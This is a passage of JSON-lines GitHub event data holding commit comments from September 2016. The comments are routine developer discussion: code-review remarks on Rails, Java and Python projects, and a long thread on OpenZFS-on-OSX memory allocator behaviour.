cookie (and user-agent) no longer exists. However, if I damage the hdntl cookie by altering a character, say in the hmac, although there is 403 responses from curl while getting mime types and such, at least when ffmpeg tries to GET it is actually sending cookies and user-agent. Still a 403 response of course. This seems like some sort of bug. Will raise a ticket on trac."}},"created_at":"2016-09-11T07:00:32Z"}
{"id":"4545365210","type":"CommitCommentEvent","actor":{"login":"leastprivilege"},"repo":{"name":"IdentityServer/IdentityServer4"},"payload":{"comment":{"id":18976284,"position":null,"line":null,"path":null,"commit_id":"6b97628504f8f0151949cb945bc289594afd9f57","created_at":"2016-09-11T07:00:55Z","updated_at":"2016-09-11T07:00:55Z","body":"Sure - still I get an exception from discovery client if the jwks endpoint does not work. So this test satisfied my requirement and went from red to green ;)\r\n\r\nIf you think you can add tests around that (and there is def room for improvement) - send a PR."}},"created_at":"2016-09-11T07:00:55Z"}
{"id":"4545368832","type":"CommitCommentEvent","actor":{"login":"hand12"},"repo":{"name":"hikariiiiiiii/protospace"},"payload":{"comment":{"id":18976286,"position":null,"line":null,"path":null,"commit_id":"c6baf017d0dfcc8f0d53054770d7363ba9d0cf81","created_at":"2016-09-11T07:03:38Z","updated_at":"2016-09-11T07:03:38Z","body":"LGTMで🙆\r\n次行きましょう！！\r\nあと、WHATとWHYはプルリク最初出すときだけでいいですよ👍"}},"created_at":"2016-09-11T07:03:38Z"}
{"id":"4545370192","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18976288,"position":10,"line":6,"path":"app/controllers/feed/imports_controller.rb","commit_id":"c36e355a0d0dca543060c1d1ede97e38d2f09a05","created_at":"2016-09-11T07:04:39Z","updated_at":"2016-09-11T07:04:39Z","body":"I agree. This method leaks the internal implementation detail, that it is using and setting a strategy. \r\nAs the one who was implementing the service, this method name seemed ok, because I knew how it was implemented anyway. But now I see that it is flawed.\r\n"}},"created_at":"2016-09-11T07:04:39Z"}
{"id":"4545370324","type":"CommitCommentEvent","actor":{"login":"rawlingsj"},"repo":{"name":"fabric8io/gofabric8"},"payload":{"comment":{"id":18976289,"position":14,"line":92,"path":"getfabric8.sh","commit_id":"4acc79d18cce034f733216414a59dfb4a9cdb436","created_at":"2016-09-11T07:04:45Z","updated_at":"2016-09-11T07:04:45Z","body":"Thanks @davsclaus - yeah I'll looking at automatically update the users `~/.zshrc` or `~/.bashrc`,  `mvn fabric8:install` already does this too.   Oh and thanks for pointing out the copy / paste error including my name!"}},"created_at":"2016-09-11T07:04:45Z"}
{"id":"4545372161","type":"CommitCommentEvent","actor":{"login":"JacksonRenault"},"repo":{"name":"JacksonRenault/JavaScript"},"payload":{"comment":{"id":18976291,"position":null,"line":null,"path":null,"commit_id":"da9023f12f49f0306e9231b4e58265733dce629d","created_at":"2016-09-11T07:06:20Z","updated_at":"2016-09-11T07:06:20Z","body":"新建"}},"created_at":"2016-09-11T07:06:20Z"}
{"id":"4545374323","type":"CommitCommentEvent","actor":{"login":"Nurdeen2539"},"repo":{"name":"Nurdeen253/MOD-BY-NURDIN"},"payload":{"comment":{"id":18976304,"position":null,"line":null,"path":null,"commit_id":"1fcc84106e76cd015fffa2f139628c3198889c27","created_at":"2016-09-11T07:08:26Z","updated_at":"2016-09-11T07:08:26Z","body":"Ok"}},"created_at":"2016-09-11T07:08:26Z"}
{"id":"4545374690","type":"CommitCommentEvent","actor":{"login":"Nurdeen2539"},"repo":{"name":"Nurdeen253/MOD-BY-NURDIN"},"payload":{"comment":{"id":18976306,"position":null,"line":null,"path":null,"commit_id":"1fcc84106e76cd015fffa2f139628c3198889c27","created_at":"2016-09-11T07:08:48Z","updated_at":"2016-09-11T07:08:48Z","body":"Order"}},"created_at":"2016-09-11T07:08:48Z"}
{"id":"4545375061","type":"CommitCommentEvent","actor":{"login":"Nurdeen2539"},"repo":{"name":"Nurdeen253/MOD-BY-NURDIN"},"payload":{"comment":{"id":18976307,"position":null,"line":null,"path":null,"commit_id":"1fcc84106e76cd015fffa2f139628c3198889c27","created_at":"2016-09-11T07:09:12Z","updated_at":"2016-09-11T07:09:12Z","body":"Ok"}},"created_at":"2016-09-11T07:09:12Z"}
{"id":"4545375826","type":"CommitCommentEvent","actor":{"login":"kszaq"},"repo":{"name":"wrxtasy/LibreELEC.tv.7.0"},"payload":{"comment":{"id":18976308,"position":null,"line":null,"path":null,"commit_id":"34802639f5990d26eafb9aebede0d310e1957aab","created_at":"2016-09-11T07:09:58Z","updated_at":"2016-09-11T07:09:58Z","body":"Here is a file with correct channel mapping for 7.1:\r\nhttps://github.com/kszaq/LibreELEC.tv/blob/wh_hd_passthrough/projects/WeTek_Hub/filesystem/usr/share/alsa/cards/AML-M8AUDIO.conf"}},"created_at":"2016-09-11T07:09:58Z"}
{"id":"4545376445","type":"CommitCommentEvent","actor":{"login":"dbarrosop"},"repo":{"name":"napalm-automation/napalm-ios"},"payload":{"comment":{"id":18976310,"position":null,"line":null,"path":null,"commit_id":"8f9726d6d4344697e61916166b1c1da253f76e46","created_at":"2016-09-11T07:10:32Z","updated_at":"2016-09-11T07:10:32Z","body":"You are right, my bad. The build failed because `netaddr` wasn't installed but the truth is that the requirement is missing in `napalm-base`. Will fix the issue in `napalm-base` later today and send a PR fixing this issue here."}},"created_at":"2016-09-11T07:10:32Z"}
{"id":"4545377081","type":"CommitCommentEvent","actor":{"login":"ventasjt92"},"repo":{"name":"ventasjt92/Javascript"},"payload":{"comment":{"id":18976316,"position":null,"line":null,"path":null,"commit_id":"8be1895506899c727e99ff9123dd8adde65a85f7","created_at":"2016-09-11T07:11:10Z","updated_at":"2016-09-11T07:11:10Z","body":"me parece que quedo bien"}},"created_at":"2016-09-11T07:11:10Z"}
{"id":"4545377186","type":"CommitCommentEvent","actor":{"login":"aaronc8"},"repo":{"name":"aaronc8/Lens-Rigidity"},"payload":{"comment":{"id":18976317,"position":null,"line":null,"path":null,"commit_id":"41ae2fcc430ed9af1d9c3cc28b0b51c139ed5d86","created_at":"2016-09-11T07:11:17Z","updated_at":"2016-09-11T07:11:17Z","body":"Added circle domain case"}},"created_at":"2016-09-11T07:11:17Z"}
{"id":"4545377786","type":"CommitCommentEvent","actor":{"login":"moreati"},"repo":{"name":"hynek/attrs"},"payload":{"comment":{"id":18976318,"position":13,"line":34,"path":"tests/test_funcs.py","commit_id":"1b419e304b01bbbcb1d0d7b0515efdbc7de73588","created_at":"2016-09-11T07:11:55Z","updated_at":"2016-09-11T07:11:55Z","body":"Did you mean to change this doc string?"}},"created_at":"2016-09-11T07:11:55Z"}
{"id":"4545381321","type":"CommitCommentEvent","actor":{"login":"kaanand54"},"repo":{"name":"kaanand54/program"},"payload":{"comment":{"id":18976320,"position":1,"line":1,"path":"removeDuplicateCharacterFromString.java","commit_id":"a9d67c228181583e4c9a699202f6da8d63592e82","created_at":"2016-09-11T07:15:17Z","updated_at":"2016-09-11T07:15:17Z","body":"Time complexity O(n)\r\n\r\nspace complexity O(1)"}},"created_at":"2016-09-11T07:15:17Z"}
{"id":"4545384426","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18976323,"position":18,"line":52,"path":"src/server/server.h","commit_id":"8de0766bfcbcab5862b4d32bdf245275169bc0aa","created_at":"2016-09-11T07:18:08Z","updated_at":"2016-09-11T07:18:08Z","body":"@qiaozhanrong 放心没有自己造轮子"}},"created_at":"2016-09-11T07:18:08Z"}
{"id":"4545388248","type":"CommitCommentEvent","actor":{"login":"RoDuth"},"repo":{"name":"RoDuth/ghini.desktop"},"payload":{"comment":{"id":18976324,"position":null,"line":null,"path":null,"commit_id":"eb37945e35dcf7f4fccf2e121cbf05f13d622336","created_at":"2016-09-11T07:21:32Z","updated_at":"2016-09-11T07:21:32Z","body":"Good point, hadn't really thought about it..."}},"created_at":"2016-09-11T07:21:32Z"}
{"id":"4545389402","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"AmberWilkie/rails_scaffold"},"payload":{"comment":{"id":18976327,"position":7,"line":5,"path":"config/routes.rb","commit_id":"42efa6a0981d4eb663dcbdb78538cb9e031933bc","created_at":"2016-09-11T07:22:37Z","updated_at":"2016-09-11T07:22:37Z","body":"Try to avoid using the 'old' hash rocket syntax. "}},"created_at":"2016-09-11T07:22:37Z"}
{"id":"4545390157","type":"CommitCommentEvent","actor":{"login":"Neetesh1"},"repo":{"name":"AOEpeople/Aoe_Scheduler"},"payload":{"comment":{"id":18976329,"position":null,"line":null,"path":null,"commit_id":"5cc0cb49e2769fbd64688f859e4c6cd94f1ab29a","created_at":"2016-09-11T07:23:17Z","updated_at":"2016-09-11T07:23:17Z","body":"i was facing this issue and above solution solved my issue. "}},"created_at":"2016-09-11T07:23:17Z"}
{"id":"4545395090","type":"CommitCommentEvent","actor":{"login":"rnixx"},"repo":{"name":"Mic92/python-mpd2"},"payload":{"comment":{"id":18976339,"position":null,"line":null,"path":null,"commit_id":"0ef01b69a4cc7cf697932641e264f2676ee62598","created_at":"2016-09-11T07:27:51Z","updated_at":"2016-09-11T07:27:51Z","body":"If we want unicode only we might remove ``use_unicode`` entirely and use ``from __future__ import unicode_literals``. What do you think?"}},"created_at":"2016-09-11T07:27:51Z"}
{"id":"4545395626","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"TeamOrion-Devices/device_oppo_common"},"payload":{"comment":{"id":18976340,"position":null,"line":null,"path":null,"commit_id":"f06e3e99678f5f47ffa7eefc86b4b516a9069314","created_at":"2016-09-11T07:28:20Z","updated_at":"2016-09-11T07:28:20Z","body":"nice"}},"created_at":"2016-09-11T07:28:20Z"}
{"id":"4545396149","type":"CommitCommentEvent","actor":{"login":"thbar"},"repo":{"name":"smiley325/quantum-elixir"},"payload":{"comment":{"id":18976341,"position":null,"line":null,"path":null,"commit_id":"4da56af2ddf514e0bd906998a356eb66cdc81352","created_at":"2016-09-11T07:28:52Z","updated_at":"2016-09-11T07:28:52Z","body":"@smiley325 oh - I didn't realize that this was part of a pull request ; then I'm wondering about the pull request. Thanks!"}},"created_at":"2016-09-11T07:28:52Z"}
{"id":"4545396823","type":"CommitCommentEvent","actor":{"login":"yvasilyev92"},"repo":{"name":"udacity/Sunshine-Version-2"},"payload":{"comment":{"id":18976342,"position":null,"line":null,"path":null,"commit_id":"ea6e195702dcb3e1ac1d9abff0242a2ab0c4a785","created_at":"2016-09-11T07:29:28Z","updated_at":"2016-09-11T07:29:28Z","body":"@hetaldadhaniya12 looks like the default setting for  country in the api calls is United States aka \"us\". Thats why you have to put \"au\" for Australia. Not sure why they made it like that. \r\nYou can also specify \"us\" in your code just like you specified \"au\". \r\n\r\nFor anyone wondering what MyOpenWeatherMapApiKey in the grade file code they put up. Just replace that with your API key that the website gives you when you create an account. \r\nEx: if my api key is 12345 then i will put '12345'  just like that as a string. \r\n\r\n\r\np.s your app is supposed to crash."}},"created_at":"2016-09-11T07:29:28Z"}
{"id":"4545397033","type":"CommitCommentEvent","actor":{"login":"dragoonblade"},"repo":{"name":"dragoonblade/task1"},"payload":{"comment":{"id":18976343,"position":5,"line":4,"path":"index.php","commit_id":"e18f1f457317a48449714b0694ff2a34725c431d","created_at":"2016-09-11T07:29:41Z","updated_at":"2016-09-11T07:29:41Z","body":"oh"}},"created_at":"2016-09-11T07:29:41Z"}
{"id":"4545399675","type":"CommitCommentEvent","actor":{"login":"hynek"},"repo":{"name":"hynek/attrs"},"payload":{"comment":{"id":18976345,"position":13,"line":34,"path":"tests/test_funcs.py","commit_id":"1b419e304b01bbbcb1d0d7b0515efdbc7de73588","created_at":"2016-09-11T07:32:07Z","updated_at":"2016-09-11T07:32:07Z","body":"Oops thanks."}},"created_at":"2016-09-11T07:32:07Z"}
{"id":"4545401803","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"AmberWilkie/rails_scaffold"},"payload":{"comment":{"id":18976349,"position":4,"line":16,"path":"spec/models/comment_spec.rb","commit_id":"d8b7bd7db717910b2c46b3caeb4d64ed8a7393e8","created_at":"2016-09-11T07:34:10Z","updated_at":"2016-09-11T07:34:10Z","body":"Plz use `is_expected` syntax. `should` is about to be deprecated by RSpec. "}},"created_at":"2016-09-11T07:34:10Z"}
{"id":"4545402322","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18976351,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-11T07:34:37Z","updated_at":"2016-09-11T07:34:37Z","body":"Congrats!"}},"created_at":"2016-09-11T07:34:37Z"}
{"id":"4545403041","type":"CommitCommentEvent","actor":{"login":"hepin1989"},"repo":{"name":"monixio/monix"},"payload":{"comment":{"id":18976353,"position":null,"line":null,"path":null,"commit_id":"5298c5ef147fdbe394ac8550d2e24af06eb630b9","created_at":"2016-09-11T07:35:17Z","updated_at":"2016-09-11T07:35:17Z","body":"not reactive anymore?"}},"created_at":"2016-09-11T07:35:17Z"}
{"id":"4545403679","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18976354,"position":3,"line":3,"path":"greeting.py","commit_id":"584e228490930da9ed3f42c987faa199679d3656","created_at":"2016-09-11T07:35:54Z","updated_at":"2016-09-11T07:35:54Z","body":"pass langs here too!"}},"created_at":"2016-09-11T07:35:54Z"}
{"id":"4545403810","type":"CommitCommentEvent","actor":{"login":"brandonblack"},"repo":{"name":"rmosolgo/graphql-ruby"},"payload":{"comment":{"id":18976355,"position":null,"line":null,"path":null,"commit_id":"db4e9c8efbe01fe0d3644cf4afa49098cc23b24f","created_at":"2016-09-11T07:36:03Z","updated_at":"2016-09-11T07:36:03Z","body":"❤️ @josh "}},"created_at":"2016-09-11T07:36:03Z"}
{"id":"4545408644","type":"CommitCommentEvent","actor":{"login":"Titeflafla"},"repo":{"name":"Titeflafla/IObit_Unlocker"},"payload":{"comment":{"id":18976359,"position":null,"line":null,"path":null,"commit_id":"2389f57d6b5f72e1b31201fc203b341a93fc14e1","created_at":"2016-09-11T07:40:34Z","updated_at":"2016-09-11T07:40:34Z","body":"Merci ;)"}},"created_at":"2016-09-11T07:40:34Z"}
{"id":"4545411141","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":18976362,"position":null,"line":null,"path":null,"commit_id":"53e1b5e178af9f48d2f972bdad3261958eb49863","created_at":"2016-09-11T07:42:52Z","updated_at":"2016-09-11T07:42:52Z","body":"This what you proposed would affect all perspective projections. The problem was only for equirectangular projection which has different aspect ratio calculation. "}},"created_at":"2016-09-11T07:42:52Z"}
{"id":"4545414646","type":"CommitCommentEvent","actor":{"login":"DREARMING"},"repo":{"name":"DREARMING/MyEffectTool"},"payload":{"comment":{"id":18976363,"position":null,"line":null,"path":null,"commit_id":"14c13bd1b6e53261adbf489d8aecd8fba469cb84","created_at":"2016-09-11T07:46:08Z","updated_at":"2016-09-11T07:46:08Z","body":"新增加更新版本效果图"}},"created_at":"2016-09-11T07:46:08Z"}
{"id":"4545417779","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"GevorSahakyan/MediaPlayer"},"payload":{"comment":{"id":18976365,"position":7,"line":7,"path":"src/aca/mediaplayer/repositories/interfaces/UserInterface.java","commit_id":"212eb44cc10a25b61b82080bb0c702c58768388e","created_at":"2016-09-11T07:49:03Z","updated_at":"2016-09-11T07:49:03Z","body":"the methods should have the following signatures\r\nUser addUser(User user) throws AlreadyExistException;\r\nUser editUser(User user) throws NotFoundException;\r\nvoid deleteUser(String userName) throws NotFoundException; or boolean deleteUser(String userName);\r\nUser getUser(String userName) throws NotFoundException;"}},"created_at":"2016-09-11T07:49:03Z"}
{"id":"4545417824","type":"CommitCommentEvent","actor":{"login":"brendonhumphrey"},"repo":{"name":"openzfsonosx/spl"},"payload":{"comment":{"id":18976366,"position":null,"line":null,"path":null,"commit_id":"6c22600ab70187ddf6d070d6bc9fc18084e031c0","created_at":"2016-09-11T07:49:05Z","updated_at":"2016-09-11T07:49:05Z","body":"Yep it was an artificial test, we’re trying to understand the massive glitches - prove that its the allocator or not. I have a constrained arc, probably only got up to 50% wired. it ran good, but clearly not a real-world configuration.\n\nResult was 3 or 4 massive glitches in my standard copy test but otherwise good (without constraining dirty_data_max). Every other build including the 4MiB parent test branch “chunky” run really badly - choppy, lots of IO stalls and glitches without constrained dirty_data_max.\n\nSo its not conclusive, at all as to whether its the allocator tying things up in my mind.\n\nNext move is to somehow try to instrument the system when its choked up.\n\n- Brendon\n\n> On 11 Sep 2016, at 12:20 AM, rottegift <notifications@github.com> wrote:\n> \n> @brendonhumphrey <https://github.com/brendonhumphrey>\n> (@lundman <https://github.com/lundman> talks about holding on to memory and giving it back from time to time, he can skip to the 3rd last paragraph of this comment :) )\n> \n> Well, sure, this should be faster, because you're not doing the cacheline locking to poke holes in xnu's freelist, and xnu's also not unmapping pages (and doing expensive tlb shootdowns).\n> \n> Please report the evolution of kstat.vmem.vmem.heap.mem_inuse and kstat.vmem.vmem.heap_parent.mem_import on your big-memory box.\n> \n> Have you hit a panic-by-watchdog yet?\n> \n> heap_alloc in this call, passed in from vmem_init() can only fail by panic here:\n> \n> https://github.com/openzfsonosx/spl/blob/greedy/module/spl/spl-seg_kmem.c#L137 <https://github.com/openzfsonosx/spl/blob/greedy/module/spl/spl-seg_kmem.c#L137>\n> But you should hit nasty OOM behaviour before then.\n> \n> If you unload when ...import is huge you might enjoy a TLB invalidation IPI timeout panic from xnu's pmap.c.\n> \n> Also you can do even better by \"heap_alloc, NULL, heap_parent, 10241024, VM_SLEEP | VMC_POPULATOR | VM_NO_QCACHE), since the \"VM_NO_QCACHE\" flag stuffs the 10241024 into vmp->vm_min_import and that in turn is used in vmem_xalloc() to set a floor on the amount of memory in the argument to osif_malloc(). (You also get some benefit in xnu's pmap asid at unload :) ).\n> \n> Ultimately the problem with this approach is that eventually (and this can be very quick on a 4GiB machine) wired grows to the point where userland starves for free memory and you get bad behaviour (including OOMs on WindowServer, for instance -- remember those? :) ).\n> \n> You could try replacing the NULL with a function that maintains an arena of vmem spans that you can blow away with a vmem_walk() on occasion (see the vmem_walk() teardown examples in vmem_fini()). For example, your heap_free function could cause the span to be imported into the freespace arena, which you can process in the background (in, or along the lines of vmem_update()).\n> \n> You could alternatively maintain a freelist gradually (again see the example in the vmem teardown, you may want a freelist along the lines of what the vmem_walks construct) and blow it all away from time to time.\n> \n> That's a direction of exploration which could be worthwhile, and which is very different from the way I've been going in my own experimental branch.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub <https://github.com/openzfsonosx/spl/commit/6c22600ab70187ddf6d070d6bc9fc18084e031c0#commitcomment-18973779>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AFWzn1YZnGfyrZx-93Nwzlg6YdGoNvLuks5qory1gaJpZM4J5uzK>.\n> \n\n"}},"created_at":"2016-09-11T07:49:05Z"}
{"id":"4545419287","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"GevorSahakyan/MediaPlayer"},"payload":{"comment":{"id":18976367,"position":10,"line":10,"path":"src/aca/mediaplayer/repositories/interfaces/TrackInterface.java","commit_id":"212eb44cc10a25b61b82080bb0c702c58768388e","created_at":"2016-09-11T07:50:16Z","updated_at":"2016-09-11T07:50:16Z","body":"the following methods \r\nTrack playTrack(Track track) throws NotFoundException;\r\nTrack stopTrack(Track track) throws NotFoundException;\r\nTrack pauseTrack(Track track) throws NotFoundException;\r\nshouldn't be on repository layer methods. They are controller methods."}},"created_at":"2016-09-11T07:50:16Z"}
{"id":"4545419649","type":"CommitCommentEvent","actor":{"login":"brendonhumphrey"},"repo":{"name":"openzfsonosx/spl"},"payload":{"comment":{"id":18976368,"position":null,"line":null,"path":null,"commit_id":"6c22600ab70187ddf6d070d6bc9fc18084e031c0","created_at":"2016-09-11T07:50:31Z","updated_at":"2016-09-11T07:50:31Z","body":"Are you sure? I look at the config of vmem in user space, and they null out the free function - I assumed that forced vmem to retain and reuse the memory. I definitely saw no bad behaviour with the arc size or anything - it stayed around 8GiB the whole time.\n\nB.\n\n> On 11 Sep 2016, at 5:17 AM, rottegift <notifications@github.com> wrote:\n> \n> Also, just occurred to me that you are not giving the memory back to the OS, but as far as vmem is concerned, it's gone (the imported span has been destroyed), and there is no real way of getting it back.\n> \n> What you could try is making a really really huge value for an underlying VM_NO_QCACHE pool, say several GiB, and put that under the heap; that will get held on to as long as a child vmem has sent non-freed vmem_[x]allocs down into it.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub <https://github.com/openzfsonosx/spl/commit/6c22600ab70187ddf6d070d6bc9fc18084e031c0#commitcomment-18974747>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AFWzn1jHg2TiM7vdSo-dkKWgisf_riS9ks5qowI5gaJpZM4J5uzK>.\n> \n\n"}},"created_at":"2016-09-11T07:50:31Z"}
{"id":"4545419876","type":"CommitCommentEvent","actor":{"login":"cardioval"},"repo":{"name":"cardioval/helloworld"},"payload":{"comment":{"id":18976370,"position":1,"line":1,"path":"README.md","commit_id":"d7ba3897cef2143567d6097228c99258de362b8d","created_at":"2016-09-11T07:50:45Z","updated_at":"2016-09-11T07:50:45Z","body":"I've made some changes on it."}},"created_at":"2016-09-11T07:50:45Z"}
{"id":"4545419877","type":"CommitCommentEvent","actor":{"login":"ptz0n"},"repo":{"name":"petterheterjag/personal-site-react"},"payload":{"comment":{"id":18976369,"position":null,"line":null,"path":null,"commit_id":"312a1b637fba59bf0e24f7d050a07be96a651244","created_at":"2016-09-11T07:50:45Z","updated_at":"2016-09-11T07:50:45Z","body":"Nice!"}},"created_at":"2016-09-11T07:50:45Z"}
{"id":"4545420245","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"GevorSahakyan/MediaPlayer"},"payload":{"comment":{"id":18976371,"position":13,"line":13,"path":"src/aca/mediaplayer/repositories/interfaces/PlaylistInterface.java","commit_id":"212eb44cc10a25b61b82080bb0c702c58768388e","created_at":"2016-09-11T07:51:04Z","updated_at":"2016-09-11T07:51:04Z","body":"the following methods \r\nPlaylist playPlaylist(Playlist playlist) throws AppException;\r\nPlaylist stopPlaylist(Playlist playlist) throws AppException;\r\nshouldn't be on repository layer methods. They are controller methods."}},"created_at":"2016-09-11T07:51:04Z"}
{"id":"4545420810","type":"CommitCommentEvent","actor":{"login":"cardioval"},"repo":{"name":"cardioval/helloworld"},"payload":{"comment":{"id":18976372,"position":null,"line":null,"path":null,"commit_id":"d7ba3897cef2143567d6097228c99258de362b8d","created_at":"2016-09-11T07:51:36Z","updated_at":"2016-09-11T07:51:36Z","body":"here is the 3rd lines."}},"created_at":"2016-09-11T07:51:36Z"}
{"id":"4545422909","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"GevorSahakyan/MediaPlayer"},"payload":{"comment":{"id":18976374,"position":3,"line":3,"path":"src/aca/mediaplayer/common/entities/AbstractUser.java","commit_id":"212eb44cc10a25b61b82080bb0c702c58768388e","created_at":"2016-09-11T07:53:32Z","updated_at":"2016-09-11T07:53:32Z","body":"Why is Class name the AbstractUser?\r\nAbstractUser should be just User."}},"created_at":"2016-09-11T07:53:32Z"}
{"id":"4545423366","type":"CommitCommentEvent","actor":{"login":"brendonhumphrey"},"repo":{"name":"openzfsonosx/spl"},"payload":{"comment":{"id":18976375,"position":null,"line":null,"path":null,"commit_id":"6c22600ab70187ddf6d070d6bc9fc18084e031c0","created_at":"2016-09-11T07:53:58Z","updated_at":"2016-09-11T07:53:58Z","body":"Any agree your later paragraphs - if we prove that we a killing the machine by stuffing the VM up, I might try what bmalloc did and feed memory back gently. malloc did not glitch like this except one or two versions where I got a bit carried away. Having said that it was a fluke that it didn’t, certainly not by design based on whatever the underlying problem may or may not be.\n\nAnd yes “chunky” and I assume “greedy” as its mostly the same code panic frequently but not always on unload.\n\nB.\n\n> On 11 Sep 2016, at 12:20 AM, rottegift <notifications@github.com> wrote:\n> \n> @brendonhumphrey <https://github.com/brendonhumphrey>\n> (@lundman <https://github.com/lundman> talks about holding on to memory and giving it back from time to time, he can skip to the 3rd last paragraph of this comment :) )\n> \n> Well, sure, this should be faster, because you're not doing the cacheline locking to poke holes in xnu's freelist, and xnu's also not unmapping pages (and doing expensive tlb shootdowns).\n> \n> Please report the evolution of kstat.vmem.vmem.heap.mem_inuse and kstat.vmem.vmem.heap_parent.mem_import on your big-memory box.\n> \n> Have you hit a panic-by-watchdog yet?\n> \n> heap_alloc in this call, passed in from vmem_init() can only fail by panic here:\n> \n> https://github.com/openzfsonosx/spl/blob/greedy/module/spl/spl-seg_kmem.c#L137 <https://github.com/openzfsonosx/spl/blob/greedy/module/spl/spl-seg_kmem.c#L137>\n> But you should hit nasty OOM behaviour before then.\n> \n> If you unload when ...import is huge you might enjoy a TLB invalidation IPI timeout panic from xnu's pmap.c.\n> \n> Also you can do even better by \"heap_alloc, NULL, heap_parent, 10241024, VM_SLEEP | VMC_POPULATOR | VM_NO_QCACHE), since the \"VM_NO_QCACHE\" flag stuffs the 10241024 into vmp->vm_min_import and that in turn is used in vmem_xalloc() to set a floor on the amount of memory in the argument to osif_malloc(). (You also get some benefit in xnu's pmap asid at unload :) ).\n> \n> Ultimately the problem with this approach is that eventually (and this can be very quick on a 4GiB machine) wired grows to the point where userland starves for free memory and you get bad behaviour (including OOMs on WindowServer, for instance -- remember those? :) ).\n> \n> You could try replacing the NULL with a function that maintains an arena of vmem spans that you can blow away with a vmem_walk() on occasion (see the vmem_walk() teardown examples in vmem_fini()). For example, your heap_free function could cause the span to be imported into the freespace arena, which you can process in the background (in, or along the lines of vmem_update()).\n> \n> You could alternatively maintain a freelist gradually (again see the example in the vmem teardown, you may want a freelist along the lines of what the vmem_walks construct) and blow it all away from time to time.\n> \n> That's a direction of exploration which could be worthwhile, and which is very different from the way I've been going in my own experimental branch.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub <https://github.com/openzfsonosx/spl/commit/6c22600ab70187ddf6d070d6bc9fc18084e031c0#commitcomment-18973779>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AFWzn1YZnGfyrZx-93Nwzlg6YdGoNvLuks5qory1gaJpZM4J5uzK>.\n> \n\n"}},"created_at":"2016-09-11T07:53:58Z"}
{"id":"4545423588","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"GevorSahakyan/MediaPlayer"},"payload":{"comment":{"id":18976376,"position":5,"line":5,"path":"src/aca/mediaplayer/Controller/Main.java","commit_id":"212eb44cc10a25b61b82080bb0c702c58768388e","created_at":"2016-09-11T07:54:09Z","updated_at":"2016-09-11T07:54:09Z","body":"Your Main class package can be package aca.mediaplayer; instead of package aca.mediaplayer.controller;"}},"created_at":"2016-09-11T07:54:09Z"}
{"id":"4545423765","type":"CommitCommentEvent","actor":{"login":"houraineet"},"repo":{"name":"houraineet/shikigami"},"payload":{"comment":{"id":18976377,"position":null,"line":null,"path":null,"commit_id":"a7a09610d84dbd3f09d1abbc1e497282ab576e7c","created_at":"2016-09-11T07:54:18Z","updated_at":"2016-09-11T07:54:18Z","body":"seriously need to refactor but too busy rip"}},"created_at":"2016-09-11T07:54:18Z"}
{"id":"4545424620","type":"CommitCommentEvent","actor":{"login":"kzidane"},"repo":{"name":"cs50/harvard.cs50.debug"},"payload":{"comment":{"id":18976378,"position":5,"line":5,"path":"bin/debug50","commit_id":"34ca117cdd919db4b6eb1f2861527592c6f5e09e","created_at":"2016-09-11T07:55:10Z","updated_at":"2016-09-11T07:55:10Z","body":"@glennholloway, good idea to change the `$0` to `$(basename $0)`? Or add `BASENAME=$(basename \"$0\")` before, and change to `$BASENAME`?"}},"created_at":"2016-09-11T07:55:10Z"}
{"id":"4545425226","type":"CommitCommentEvent","actor":{"login":"projectkk2glider"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":18976379,"position":null,"line":null,"path":null,"commit_id":"f131c79b87cbda16f240af9e342ab178fd6c6f28","created_at":"2016-09-11T07:55:40Z","updated_at":"2016-09-11T07:55:40Z","body":"This commit breaks the play sound: if repeat 1x is selected, the sound repeats forever."}},"created_at":"2016-09-11T07:55:40Z"}
{"id":"4545425286","type":"CommitCommentEvent","actor":{"login":"amirma"},"repo":{"name":"DeviantJS/angular2-seed-material2"},"payload":{"comment":{"id":18976380,"position":4,"line":286,"path":"tools/config/seed.config.ts","commit_id":"83d5e8b82d8f8a609769c5c7e1684b55607ac761","created_at":"2016-09-11T07:55:44Z","updated_at":"2016-09-11T07:55:44Z","body":"What's the point of this definition?"}},"created_at":"2016-09-11T07:55:44Z"}
{"id":"4545428287","type":"CommitCommentEvent","actor":{"login":"Mic92"},"repo":{"name":"Mic92/python-mpd2"},"payload":{"comment":{"id":18976381,"position":null,"line":null,"path":null,"commit_id":"0ef01b69a4cc7cf697932641e264f2676ee62598","created_at":"2016-09-11T07:58:41Z","updated_at":"2016-09-11T07:58:41Z","body":"For the twisted version this is acceptable. I want to leave this in for the python2 version of mpd\r\nto avoid to much breakage, when migrating from the original version."}},"created_at":"2016-09-11T07:58:41Z"}
